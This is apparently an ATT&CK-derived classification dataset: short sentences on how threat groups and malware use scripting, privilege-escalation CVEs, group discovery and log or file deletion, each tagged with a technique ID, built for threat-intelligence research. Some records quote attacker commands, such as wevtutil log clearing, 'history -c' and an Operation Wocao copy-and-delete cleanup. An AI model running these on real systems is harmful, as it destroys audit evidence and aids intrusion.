{"text1":"Koadic performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .","labels":"['T1059.005']"}
{"text1":"Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code.","labels":"['T1059.005']"}
{"text1":"Lazarus Group has used VBScript to gather information about a victim machine.","labels":"['T1059.005']"}
{"text1":"Lokibot has used VBS scripts and XLS macros for execution.","labels":"['T1059.005']"}
{"text1":"LookBack has used VBA macros in Microsoft Word attachments to drop additional files to the host.","labels":"['T1059.005']"}
{"text1":"Machete has embedded malicious macros within spearphishing attachments to download additional files.","labels":"['T1059.005']"}
{"text1":"Magic Hound malware has used VBS scripts for execution.","labels":"['T1059.005']"}
{"text1":"Melcoz can use VBS scripts to execute malicious DLLs.","labels":"['T1059.005']"}
{"text1":"Metamorfo has used VBS code on victims\u2019 systems.","labels":"['T1059.005']"}
{"text1":"MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros.","labels":"['T1059.005']"}
{"text1":"NETWIRE has been executed through use of VBScripts.","labels":"['T1059.005']"}
{"text1":"NanHaiShu executes additional VBScript code on the victim's machine.","labels":"['T1059.005']"}
{"text1":"NanoCore uses VBS files.","labels":"['T1059.005']"}
{"text1":"OSX_OCEANLOTUS.D uses Word macros for execution.","labels":"['T1059.005']"}
{"text1":"OilRig has used VBSscipt macros for execution on compromised hosts.","labels":"['T1059.005']"}
{"text1":"One version of Helminth consists of VBScript scripts.","labels":"['T1059.005']"}
{"text1":"OopsIE creates and uses a VBScript as part of its persistent execution.","labels":"['T1059.005']"}
{"text1":"Operation Wocao has used a VBScript to conduct reconnaissance on targeted systems.","labels":"['T1059.005']"}
{"text1":"POWERSTATS can use VBScript (VBE) code for execution.","labels":"['T1059.005']"}
{"text1":"Patchwork used Visual Basic Scripts (VBS) on victim machines.","labels":"['T1059.005']"}
{"text1":"Pteranodon can use a malicious VBS file for execution.","labels":"['T1059.005']"}
{"text1":"QUADAGENT uses VBScripts.","labels":"['T1059.005']"}
{"text1":"REvil has used obfuscated VBA macros for execution.","labels":"['T1059.005']"}
{"text1":"Ramsay has included embedded Visual Basic scripts in malicious documents.","labels":"['T1059.005']"}
{"text1":"Rancor has used VBS scripts as well as embedded macros for execution.","labels":"['T1059.005']"}
{"text1":"Remexi uses AutoIt and VBS scripts throughout its execution process.","labels":"['T1059.005']"}
{"text1":"SUNBURST used VBScripts to initiate the execution of payloads.","labels":"['T1059.005']"}
{"text1":"Saint Bot has used `.vbs` scripts for execution.","labels":"['T1059.005']"}
{"text1":"Sibot executes commands using VBScript.","labels":"['T1059.005']"}
{"text1":"Sidewinder has used VBScript to drop and execute malware loaders.","labels":"['T1059.005']"}
{"text1":"Silence has used VBS scripts.","labels":"['T1059.005']"}
{"text1":"Smoke Loader adds a Visual Basic script in the Startup folder to deploy the payload.","labels":"['T1059.005']"}
{"text1":"StoneDrill has several VBS scripts used throughout the malware's lifecycle.","labels":"['T1059.005']"}
{"text1":"TA459 has a VBScript for execution.","labels":"['T1059.005']"}
{"text1":"TA505 has used VBS for code execution.","labels":"['T1059.005']"}
{"text1":"TYPEFRAME has used a malicious Word document for delivery with VBA macros for execution.","labels":"['T1059.005']"}
{"text1":"Transparent Tribe has crafted VBS-based malicious documents.","labels":"['T1059.005']"}
{"text1":"Turla has used VBS scripts throughout its operations.","labels":"['T1059.005']"}
{"text1":"Ursnif droppers have used VBA macros to download and execute the malware's full executable payload.","labels":"['T1059.005']"}
{"text1":"WIRTE has used VBScript  in its operations.","labels":"['T1059.005']"}
{"text1":"WhisperGate can use a Visual Basic script to exclude the `C:\\` drive from Windows Defender.","labels":"['T1059.005']"}
{"text1":"Windshift has used Visual Basic 6 (VB6) payloads.","labels":"['T1059.005']"}
{"text1":"jRAT has been distributed as HTA files with VBScript.","labels":"['T1059.005']"}
{"text1":"APT29 has developed malware variants written in Python.","labels":"['T1059.006']"}
{"text1":"APT37 has used Python scripts to execute payloads.","labels":"['T1059.006']"}
{"text1":"APT39 has used a command line utility and a network scanner written in python.","labels":"['T1059.006']"}
{"text1":"BRONZE BUTLER has made use of Python-based remote access tools.","labels":"['T1059.006']"}
{"text1":"Bundlore has used Python scripts to execute payloads.","labels":"['T1059.006']"}
{"text1":"Cobalt Strike can use Python to perform execution.","labels":"['T1059.006']"}
{"text1":"CoinTicker executes a Python script to download its second stage.","labels":"['T1059.006', 'T1105']"}
{"text1":"CookieMiner has used python scripts on the user\u2019s system, as well as the Python variant of the Empire agent, EmPyre.","labels":"['T1059.006']"}
{"text1":"Dragonfly 2.0 used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.","labels":"['T1059.006']"}
{"text1":"Dragonfly has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.","labels":"['T1059.006']"}
{"text1":"DropBook is a Python-based backdoor compiled with PyInstaller.","labels":"['T1059.006']"}
{"text1":"During Operation Wocao, threat actors' backdoors were written in Python and compiled with py2exe.","labels":"['T1059.006']"}
{"text1":"IronNetInjector can use IronPython scripts to load payloads with the help of a .NET injector.","labels":"['T1059.006']"}
{"text1":"KeyBoy uses Python scripts for installing files and performing execution.","labels":"['T1059.006']"}
{"text1":"Keydnap uses Python for scripting to execute additional commands.","labels":"['T1059.006']"}
{"text1":"Machete used multiple compiled Python scripts on the victim\u2019s system. Machete's main backdoor Machete is also written in Python.","labels":"['T1059.006']"}
{"text1":"MechaFlounder uses a python-based payload.","labels":"['T1059.006']"}
{"text1":"MuddyWater has used developed tools in Python including Out1.","labels":"['T1059.006']"}
{"text1":"Operation Wocao's backdoors have been written in Python and compiled with py2exe.","labels":"['T1059.006']"}
{"text1":"PUNCHBUGGY has used python scripts.","labels":"['T1059.006']"}
{"text1":"Pupy can use an add on feature when creating payloads that allows you to create custom Python scripts (\u201cscriptlets\u201d) to perform tasks offline (without requiring a session) such as sandbox detection, adding persistence, etc.","labels":"['T1059.006']"}
{"text1":"PyDCrypt, along with its functions, is written in Python.","labels":"['T1059.006']"}
{"text1":"Pysa has used Python scripts to deploy ransomware.","labels":"['T1059.006']"}
{"text1":"Remcos uses Python scripts.","labels":"['T1059.006']"}
{"text1":"Rocke has used Python-based malware to install and spread their coinminer.","labels":"['T1059.006']"}
{"text1":"Small Sieve can use Python scripts to execute commands.","labels":"['T1059.006']"}
{"text1":"SpeakUp uses Python scripts.","labels":"['T1059.006']"}
{"text1":"TRITON was run as trilog.exe, a Py2EXE compiled python script that accepts a single IP address as a flag.","labels":"['T1059.006']"}
{"text1":"Turian has the ability to use Python to spawn a Unix shell.","labels":"['T1059.006']"}
{"text1":"Turla has used IronPython scripts as part of the IronNetInjector toolchain to drop payloads.","labels":"['T1059.006']"}
{"text1":"ZIRCONIUM has used Python-based implants to interact with compromised hosts.","labels":"['T1059.006']"}
{"text1":"APT32 has used JavaScript for drive-by downloads and C2 communications.","labels":"['T1059.007']"}
{"text1":"AppleSeed has the ability to use JavaScript to execute PowerShell.","labels":"['T1059.007']"}
{"text1":"Astaroth uses JavaScript to perform its core functionalities.","labels":"['T1059.007']"}
{"text1":"Bundlore can execute JavaScript by injecting it into the victim's browser.","labels":"['T1059.007']"}
{"text1":"Chaes has used JavaScript and Node.Js information stealer script that exfiltrates data using the node process.","labels":"['T1059.007']"}
{"text1":"Cobalt Group has executed JavaScript scriptlets on the victim's machine.","labels":"['T1059.007']"}
{"text1":"During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript\/VBScript code.","labels":"['T1059.007']"}
{"text1":"During Operation Dust Storm, the threat actors used JavaScript code.","labels":"['T1059.007']"}
{"text1":"Earth Lusca has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.","labels":"['T1059.007']"}
{"text1":"Ember Bear has used JavaScript to execute malicious code on a victim's machine.","labels":"['T1059.007']"}
{"text1":"EnvyScout can write files to disk with JavaScript using a modified version of the open-source tool FileSaver.","labels":"['T1059.007']"}
{"text1":"Evilnum has used malicious JavaScript files on the victim's machine.","labels":"['T1059.007']"}
{"text1":"FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.","labels":"['T1059.007']"}
{"text1":"Indrik Spider has used malicious JavaScript files for several components of their attack.","labels":"['T1059.007']"}
{"text1":"JSS Loader can download and execute JavaScript files.","labels":"['T1059.007']"}
{"text1":"KONNI has executed malicious JavaScript code.","labels":"['T1059.007']"}
{"text1":"LazyScripter has used JavaScript in its attacks.","labels":"['T1059.007']"}
{"text1":"Leafminer infected victims using JavaScript code.","labels":"['T1059.007']"}
{"text1":"Metamorfo includes payloads written in JavaScript.","labels":"['T1059.007']"}
{"text1":"Molerats used various implants, including those built with JS, on target machines.","labels":"['T1059.007']"}
{"text1":"MuddyWater has used JavaScript files to execute its POWERSTATS payload.","labels":"['T1059.007']"}
{"text1":"NanHaiShu executes additional Jscript code on the victim's machine.","labels":"['T1059.007']"}
{"text1":"POWERSTATS can use JavaScript code for execution.","labels":"['T1059.007']"}
{"text1":"Sidewinder has used JavaScript to drop and execute malware loaders.","labels":"['T1059.007']"}
{"text1":"Silence has used JS scripts.","labels":"['T1059.007']"}
{"text1":"SpicyOmelette has the ability to execute arbitrary JavaScript code on a compromised host.","labels":"['T1059.007']"}
{"text1":"The Cobalt Strike System Profiler can use JavaScript to perform reconnaissance actions.","labels":"['T1059.007']"}
{"text1":"The QakBot web inject module can inject Java Script into web banking pages visited by the victim.","labels":"['T1059.007']"}
{"text1":"Turla has used various JavaScript-based backdoors.","labels":"['T1059.007']"}
{"text1":"Valak can execute JavaScript containing configuration data for establishing persistence.","labels":"['T1059.007']"}
{"text1":"Xbash can execute malicious JavaScript payloads on the victim\u2019s machine.","labels":"['T1059.007']"}
{"text1":"jRAT has been distributed as HTA files with JScript.","labels":"['T1059.007']"}
{"text1":"APT28 has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263 to escalate privileges.","labels":"['T1068']"}
{"text1":"APT29 has exploited CVE-2021-36934 to escalate privileges on a compromised host.","labels":"['T1068']"}
{"text1":"APT32 has used CVE-2016-7255 to escalate privileges.","labels":"['T1068']"}
{"text1":"Carberp has exploited multiple Windows vulnerabilities (CVE-2010-2743, CVE-2010-3338, CVE-2010-4398, CVE-2008-1084) and a .NET Runtime Optimization vulnerability for privilege escalation.","labels":"['T1068']"}
{"text1":"Empire can exploit vulnerabilities such as MS16-032 and MS16-135.","labels":"['T1068']"}
{"text1":"Hildegard has used the BOtB tool which exploits CVE-2019-5736.","labels":"['T1068']"}
{"text1":"InvisiMole has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges.","labels":"['T1068']"}
{"text1":"JHUHUGIT has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.","labels":"['T1068']"}
{"text1":"LAPSUS$ has exploited unpatched vulnerabilities on internally accessible servers including JIRA, GitLab, and Confluence for privilege escalation.","labels":"['T1068']"}
{"text1":"PLATINUM has leveraged a zero-day vulnerability to escalate privileges.","labels":"['T1068']"}
{"text1":"Pandora can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement (DSE) protection and load its driver.","labels":"['T1068']"}
{"text1":"PoshC2 contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099.","labels":"['T1068']"}
{"text1":"Siloscape has leveraged a vulnerability in Windows containers to perform an Escape to Host.","labels":"['T1068']"}
{"text1":"Tonto Team has exploited CVE-2019-0803 and MS16-032 to escalate privileges.","labels":"['T1068']"}
{"text1":"Whitefly has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers.","labels":"['T1068']"}
{"text1":"Wingbird exploits CVE-2016-4117 to allow an executable to gain escalated privileges.","labels":"['T1068']"}
{"text1":"ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation.","labels":"['T1068']"}
{"text1":"Zox has the ability to leverage local and remote exploits to escalate privileges.","labels":"['T1068']"}
{"text1":"APT29 used the \"Get-ManagementRoleAssignment\" PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.","labels":"['T1069']"}
{"text1":"APT3 has a tool that can enumerate the permissions associated with Windows groups.","labels":"['T1069']"}
{"text1":"IcedID has the ability to identify Workgroup membership.","labels":"['T1069']"}
{"text1":"MURKYTOP has the capability to retrieve information about groups.","labels":"['T1069']"}
{"text1":"PUNCHBUGGY can gather domain and workgroup information.","labels":"['T1069']"}
{"text1":"TA505 has used TinyMet to enumerate members of privileged groups. TA505 has also run \"net group \/domain\".","labels":"['T1069']"}
{"text1":"UNC2452 used the \"Get-ManagementRoleAssignment\" PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.","labels":"['T1069']"}
{"text1":"Chimera has used \"net localgroup administrators\" to identify  accounts with local administrative rights.","labels":"['T1069.001']"}
{"text1":"Cobalt Strike can use \"net localgroup\" to list local groups on a system.","labels":"['T1069.001']"}
{"text1":"Commands such as \"net group\" and \"net localgroup\" can be used in Net to gather information about and manipulate groups.","labels":"['T1069.001']"}
{"text1":"During C0015, the threat actors used the command `net localgroup \"adminstrator\" ` to identify accounts with local administrator rights.","labels":"['T1069.001']"}
{"text1":"During Operation CuckooBees, the threat actors used the `net group` command as part of their advanced reconnaissance.","labels":"['T1069.001']"}
{"text1":"During Operation Wocao, threat actors used the command `net localgroup administrators` to list all administrators part of a local group.","labels":"['T1069.001']"}
{"text1":"Emissary has the capability to execute the command \"net localgroup administrators\".","labels":"['T1069.001']"}
{"text1":"Epic gathers information on local group names.","labels":"['T1069.001']"}
{"text1":"Flagpro has been used to execute the \"net localgroup administrators\" command on a targeted system.","labels":"['T1069.001']"}
{"text1":"Helminth has checked the local administrators group.","labels":"['T1069.001']"}
{"text1":"JPIN can obtain the permissions of the victim user.","labels":"['T1069.001']"}
{"text1":"Kazuar gathers information about local groups and members.","labels":"['T1069.001']"}
{"text1":"Kwampirs collects a list of users belonging to the local users and administrators groups with the commands \"net localgroup administrators\" and \"net localgroup users\".","labels":"['T1069.001']"}
{"text1":"OSInfo has enumerated the local administrators group.","labels":"['T1069.001']"}
{"text1":"OilRig has used \"net localgroup administrators\" to find local administrators on compromised systems.","labels":"['T1069.001']"}
{"text1":"POWRUNER may collect local group information by running \"net localgroup administrators\" or a series of other commands on a victim.","labels":"['T1069.001']"}
{"text1":"PoshC2 contains modules, such as \"Get-LocAdm\" for enumerating permission groups.","labels":"['T1069.001']"}
{"text1":"QakBot can use \"net localgroup\" to enable discovery of local groups.","labels":"['T1069.001']"}
{"text1":"Tonto Team has used the \"ShowLocalGroupDetails\" command to identify administrator, user, and guest accounts on a compromised host.","labels":"['T1069.001']"}
{"text1":"Turla has used \"net localgroup\" and \"net localgroup Administrators\" to enumerate group information, including members of the local administrators group.","labels":"['T1069.001']"}
{"text1":"admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to list local groups: \"net localgroup administrator >> %temp%\\download\"","labels":"['T1069.001']"}
{"text1":"APT29 has used AdFind to enumerate domain groups.","labels":"['T1069.002']"}
{"text1":"AdFind can enumerate domain groups.","labels":"['T1069.002']"}
{"text1":"BloodHound can collect information about domain groups and members.","labels":"['T1069.002']"}
{"text1":"Cobalt Strike can identify targets by querying account groups on a domain contoller.","labels":"['T1069.002']"}
{"text1":"Commands such as \"net group \/domain\" can be used in Net to gather information about and manipulate groups.","labels":"['T1069.002']"}
{"text1":"CrackMapExec can gather the user accounts within domain groups.","labels":"['T1069.002']"}
{"text1":"Dragonfly 2.0 used batch scripts to enumerate administrators and users in the domain.","labels":"['T1069.002']"}
{"text1":"During C0015, the threat actors use the command `net group \"domain admins\" \/dom` to enumerate domain groups.","labels":"['T1069.002']"}
{"text1":"Helminth has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands \"net group Exchange Trusted Subsystem \/domain\" and \"net group domain admins \/domain\".","labels":"['T1069.002']"}
{"text1":"Inception has used specific malware modules to gather domain membership.","labels":"['T1069.002']"}
{"text1":"Ke3chang performs discovery of permission groups \"net group \/domain\".","labels":"['T1069.002']"}
{"text1":"Kwampirs collects a list of domain groups with the command \"net localgroup \/domain\".","labels":"['T1069.002']"}
{"text1":"LAPSUS$ has used the AD Explorer tool to enumerate groups on a victim's network.","labels":"['T1069.002']"}
{"text1":"OSInfo specifically looks for Domain Admins and power users within the domain.","labels":"['T1069.002']"}
{"text1":"REvil can identify the domain membership of a compromised host.","labels":"['T1069.002']"}
{"text1":"SoreFang can enumerate domain groups by executing \"net.exe group \/domain\".","labels":"['T1069.002']"}
{"text1":"Turla has used \"net group \"Domain Admins\" \/domain\" to identify domain administrators.","labels":"['T1069.002']"}
{"text1":"WellMess can identify domain group membership for the current user.","labels":"['T1069.002']"}
{"text1":"Wizard Spider has used \"AdFind.exe\" to collect information about Active Directory groups and accounts.","labels":"['T1069.002']"}
{"text1":"dsquery can be used to gather information on permission groups within a domain.","labels":"['T1069.002']"}
{"text1":"AADInternals can enumerate Azure AD groups.","labels":"['T1069.003']"}
{"text1":"ROADTools can enumerate Azure AD groups.","labels":"['T1069.003']"}
{"text1":"APT29 temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.","labels":"['T1070']"}
{"text1":"APT29 used SDelete to remove artifacts from victims.","labels":"['T1070']"}
{"text1":"Bankshot deletes all artifacts associated with the malware from the infected machine.","labels":"['T1070']"}
{"text1":"Bazar's loader can delete scheduled tasks created by a previous instance of the malware.","labels":"['T1070', 'T1070.009']"}
{"text1":"BlackEnergy has removed the watermark associated with enabling the \"TESTSIGNING\" boot configuration option by removing the relevant strings in the \"user32.dll.mui\" of the system.","labels":"['T1070']"}
{"text1":"Donut can erase file references to payloads in-memory after being reflectively loaded and executed.","labels":"['T1070']"}
{"text1":"Dragonfly deleted system, security, terminal services, remote services, and audit logs from a victim.","labels":"['T1070']"}
{"text1":"EVILNUM has a function called \"DeleteLeftovers\" to remove certain artifacts of the attack.","labels":"['T1070']"}
{"text1":"Flagpro can close specific Windows Security and Internet Explorer dialog boxes to mask external connections.","labels":"['T1070']"}
{"text1":"Goopy has the ability to delete emails used for C2 once the content has been copied.","labels":"['T1070', 'T1070.008']"}
{"text1":"GrimAgent can delete previously created tasks on a compromised host.","labels":"['T1070', 'T1070.009']"}
{"text1":"HermeticWiper can disable pop-up information about folders and desktop items and delete Registry keys to hide malicious services.","labels":"['T1070']"}
{"text1":"KOCTOPUS can delete created registry keys as part of its cleanup procedure.","labels":"['T1070']"}
{"text1":"Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked.","labels":"['T1070']"}
{"text1":"Maze has used the \u201cWow64RevertWow64FsRedirection\u201d function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.","labels":"['T1070']"}
{"text1":"Metamorfo has a command to delete a Registry key it uses, \"\\Software\\Microsoft\\Internet Explorer\\notes\".","labels":"['T1070']"}
{"text1":"Misdat is capable of deleting Registry keys used for persistence.","labels":"['T1070', 'T1070.009']"}
{"text1":"Neoichor can clear the browser history on a compromised host by changing the `ClearBrowsingHistoryOnExit` value to 1 in the `HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Privacy` Registry key.","labels":"['T1070']"}
{"text1":"Orz can overwrite Registry settings to reduce its visibility on the victim.","labels":"['T1070']"}
{"text1":"Pillowmint can uninstall the malicious service from an infected machine.","labels":"['T1070', 'T1070.009']"}
{"text1":"RTM has the ability to remove Registry entries that it created during execution.","labels":"['T1070']"}
{"text1":"Rising Sun can clear a memory blog in the process by overwriting it with junk bytes.","labels":"['T1070']"}
{"text1":"S-Type has deleted accounts it has created.","labels":"['T1070']"}
{"text1":"SDBbot has the ability to clean up and remove data structures from a compromised host.","labels":"['T1070']"}
{"text1":"SILENTTRINITY can remove artifacts from the compromised host, including created Registry keys.","labels":"['T1070']"}
{"text1":"ShadowPad has deleted arbitrary Registry values.","labels":"['T1070']"}
{"text1":"Sibot will delete an associated registry key if a certain server response is received.","labels":"['T1070']"}
{"text1":"UNC2452 removed evidence of email export requests using \"Remove-MailboxExportRequest\". They temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.","labels":"['T1070']"}
{"text1":"njRAT is capable of manipulating and deleting registry keys.","labels":"['T1070']"}
{"text1":"APT28 has cleared event logs, including by using the commands \"wevtutil cl System\" and \"wevtutil cl Security\".","labels":"['T1070.001']"}
{"text1":"APT32 has cleared select event log entries.","labels":"['T1070.001']"}
{"text1":"APT38 clears Window Event logs and Sysmon logs from the system.","labels":"['T1070.001']"}
{"text1":"APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.","labels":"['T1070.001']"}
{"text1":"Dragonfly 2.0 cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.","labels":"['T1070.001']"}
{"text1":"Dragonfly has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.","labels":"['T1070.001']"}
{"text1":"During Operation Wocao, the threat actors deleted all Windows system and security event logs using `\/Q \/c wevtutil cl system` and `\/Q \/c wevtutil cl security`.","labels":"['T1070.001']"}
{"text1":"FIN5 has cleared event logs from victims.","labels":"['T1070.001']"}
{"text1":"FIN8 has cleared logs during post compromise cleanup activities.","labels":"['T1070.001']"}
{"text1":"FinFisher clears the system event logs using \" OpenEventLog\/ClearEventLog APIs \".","labels":"['T1070.001']"}
{"text1":"HermeticWizard has the ability to use `wevtutil cl system` to clear event logs.","labels":"['T1070.001']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can clear all system event logs.","labels":"['T1070.001']"}
{"text1":"Indrik Spider has used Cobalt Strike to empty log files.","labels":"['T1070.001']"}
{"text1":"KillDisk deletes Application, Security, Setup, and System Windows Event Logs.","labels":"['T1070.001']"}
{"text1":"Lucifer can clear and remove event logs.","labels":"['T1070.001']"}
{"text1":"Meteor can use Wevtutil to remove Security, System and Application Event Viewer logs.","labels":"['T1070.001']"}
{"text1":"NotPetya uses \"wevtutil\" to clear the Windows event logs.","labels":"['T1070.001']"}
{"text1":"Olympic Destroyer will attempt to clear the System and Security event logs using \"wevtutil\".","labels":"['T1070.001']"}
{"text1":"Operation Wocao has deleted Windows Event Logs to hinder forensic investigation.","labels":"['T1070.001']"}
{"text1":"Pupy has a module to clear event logs with PowerShell.","labels":"['T1070.001']"}
{"text1":"RunningRAT contains code to clear event logs.","labels":"['T1070.001']"}
{"text1":"The BlackEnergy component KillDisk is capable of deleting Windows Event Logs.","labels":"['T1070.001']"}
{"text1":"ZxShell has a command to clear system event logs.","labels":"['T1070.001']"}
{"text1":"MacMa can clear possible malware traces such as application logs.","labels":"['T1070.002']"}
{"text1":"Proton removes logs from \"\/var\/logs\" and \"\/Library\/logs\".","labels":"['T1070.002']"}
{"text1":"TeamTNT has removed system logs from \"\/var\/log\/syslog\".","labels":"['T1070.002']"}
{"text1":"APT41 attempted to remove evidence of some of its activity by deleting Bash histories.","labels":"['T1070.003']"}
{"text1":"Hildegard has used history -c to clear script shell logs.","labels":"['T1070.003']"}
{"text1":"Kobalos can remove all command history on compromised hosts.","labels":"['T1070.003']"}
{"text1":"Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.","labels":"['T1070.003']"}
{"text1":"Magic Hound has removed mailbox export requests from compromised Exchange servers.","labels":"['T1070.003']"}
{"text1":"TeamTNT has cleared command history with \"history -c\".","labels":"['T1070.003']"}
{"text1":"A menuPass macro deletes files after it has decoded and decompressed them.","labels":"['T1070.004']"}
{"text1":"ADVSTORESHELL can delete files and directories.","labels":"['T1070.004']"}
{"text1":"APT18 actors deleted tools and batch files from victim systems.","labels":"['T1070.004']"}
{"text1":"APT28 has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner.","labels":"['T1070.004']"}
{"text1":"APT29 routinely removed their tools, including custom backdoors, once remote access was achieved. APT29 has also used SDelete to remove artifacts from victims.","labels":"['T1070.004']"}
{"text1":"APT3 has a tool that can delete files.","labels":"['T1070.004']"}
{"text1":"APT32's macOS backdoor can receive a \u201cdelete\u201d command.","labels":"['T1070.004']"}
{"text1":"APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.","labels":"['T1070.004']"}
{"text1":"APT39 has used malware to delete files after they are deployed on a compromised host.","labels":"['T1070.004']"}
{"text1":"After encrypting its own log files, the log encryption module in Prikormka deletes the original, unencrypted files from the host.","labels":"['T1070.004']"}
{"text1":"Anchor can self delete its dropper after the malware is successfully deployed.","labels":"['T1070.004']"}
{"text1":"AppleJeus has deleted the MSI file after installation.","labels":"['T1070.004']"}
{"text1":"Aquatic Panda has deleted malicious executables from compromised machines.","labels":"['T1070.004']"}
{"text1":"Aria-body has the ability to delete files and directories on compromised hosts.","labels":"['T1070.004']"}
{"text1":"AuditCred can delete files from the system.","labels":"['T1070.004']"}
{"text1":"Azorult can delete files from victim machines.","labels":"['T1070.004']"}
{"text1":"BBSRAT can delete files and directories.","labels":"['T1070.004']"}
{"text1":"BLINDINGCAN has deleted itself and associated artifacts from victim machines.","labels":"['T1070.004']"}
{"text1":"BLUELIGHT can uninstall itself.","labels":"['T1070.004']"}
{"text1":"BabyShark has cleaned up all files associated with the secondary payload execution.","labels":"['T1070.004']"}
{"text1":"Backdoor.Oldrea contains a cleanup module that removes traces of itself from the victim.","labels":"['T1070.004']"}
{"text1":"Bandook has a command to delete a file.","labels":"['T1070.004']"}
{"text1":"Bankshot marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.","labels":"['T1070.004']"}
{"text1":"Bumblebee can uninstall its loader through the use of a `Sdl` command.","labels":"['T1070.004']"}
{"text1":"CARROTBAT has the ability to delete downloaded files from a compromised host.","labels":"['T1070.004']"}
{"text1":"CSPY Downloader has the ability to self delete.","labels":"['T1070.004']"}
{"text1":"Calisto has the capability to use \"rm -rf\" to remove folders and files from the victim's machine.","labels":"['T1070.004']"}
{"text1":"Cardinal RAT can uninstall itself, including deleting its executable.","labels":"['T1070.004']"}
{"text1":"CharmPower can delete created files from a compromised system.","labels":"['T1070.004']"}
{"text1":"Chimera has performed file deletion to evade detection.","labels":"['T1070.004']"}
{"text1":"Crimson has the ability to delete files from a compromised host.","labels":"['T1070.004']"}
{"text1":"Cuba can use the command \"cmd.exe \/c del\" to delete its artifacts from the system.","labels":"['T1070.004']"}
{"text1":"DanBot can delete its configuration file after installation.","labels":"['T1070.004']"}
{"text1":"DarkWatchman has been observed deleting its original launcher after installation.","labels":"['T1070.004']"}
{"text1":"Dragonfly 2.0 deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.","labels":"['T1070.004']"}
{"text1":"Dragonfly has deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.","labels":"['T1070.004']"}
{"text1":"Drovorub can delete specific files from a compromised host.","labels":"['T1070.004']"}
{"text1":"Dtrack can remove its persistence and delete itself.","labels":"['T1070.004']"}
{"text1":"During Operation Honeybee, the threat actors used batch files that reduced their fingerprint on a compromised system by deleting malware-related files.","labels":"['T1070.004']"}
{"text1":"During Operation Wocao, the threat actors consistently removed traces of their activity by first overwriting a file using `\/c cd \/d c:\\windows\\temp\\ & copy \\\\<IP ADDRESS>\\c$\\windows\\system32\\devmgr.dll \\\\<IP ADDRESS>\\c$\\windows\\temp\\LMAKSW.ps1 \/y` and then deleting the overwritten file using `\/c cd \/d c:\\windows\\temp\\ & del \\\\<IP ADDRESS>\\c$\\windows\\temp\\LMAKSW.ps1`.","labels":"['T1070.004']"}
{"text1":"DustySky can delete files it creates from the infected system.","labels":"['T1070.004']"}
{"text1":"ECCENTRICBANDWAGON can delete log files generated from the malware stored at \"C:\\windows\\temp\\tmp0207\".","labels":"['T1070.004']"}
{"text1":"EvilBunny has deleted the initial dropper after running through the environment checks.","labels":"['T1070.004']"}
{"text1":"Evilnum has deleted files used during infection.","labels":"['T1070.004']"}
{"text1":"Exaramel for Linux can uninstall its persistence mechanism and delete its configuration file.","labels":"['T1070.004']"}
{"text1":"FELIXROOT deletes the .LNK file from the startup directory as well as the dropper components.","labels":"['T1070.004']"}
{"text1":"FIN10 has used batch scripts and scheduled tasks to delete critical system files.","labels":"['T1070.004']"}
{"text1":"FIN5 uses SDelete to clean up the environment and attempt to prevent detection.","labels":"['T1070.004']"}
{"text1":"FIN6 has removed files from victim machines.","labels":"['T1070.004']"}
{"text1":"FIN8 has deleted tmp and prefetch files during post compromise cleanup activities.","labels":"['T1070.004']"}
{"text1":"FatDuke can secure delete its DLL.","labels":"['T1070.004']"}
{"text1":"Ferocious can delete files from a compromised host.","labels":"['T1070.004']"}
{"text1":"FlawedAmmyy can execute batch scripts to delete files.","labels":"['T1070.004']"}
{"text1":"FruitFly will delete files on the system.","labels":"['T1070.004']"}
{"text1":"Fysbis has the ability to delete files.","labels":"['T1070.004']"}
{"text1":"Gamaredon Group tools can delete files used during an operation.","labels":"['T1070.004']"}
{"text1":"Gazer has commands to delete files and persistence mechanisms from the victim.","labels":"['T1070.004']"}
{"text1":"Gelsemium can delete its dropper component from the targeted system.","labels":"['T1070.004']"}
{"text1":"Gold Dragon deletes one of its files, 2.hwp, from the endpoint after establishing persistence.","labels":"['T1070.004']"}
{"text1":"Green Lambert can delete the original executable after initial installation in addition to unused functions.","labels":"['T1070.004']"}
{"text1":"GreyEnergy can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API.","labels":"['T1070.004']"}
{"text1":"GrimAgent can delete old binaries on a compromised host.","labels":"['T1070.004']"}
{"text1":"HALFBAKED can delete a specified file.","labels":"['T1070.004']"}
{"text1":"HAWKBALL has the ability to delete files.","labels":"['T1070.004']"}
{"text1":"Hancitor has deleted files using the VBA \"kill\" function.","labels":"['T1070.004']"}
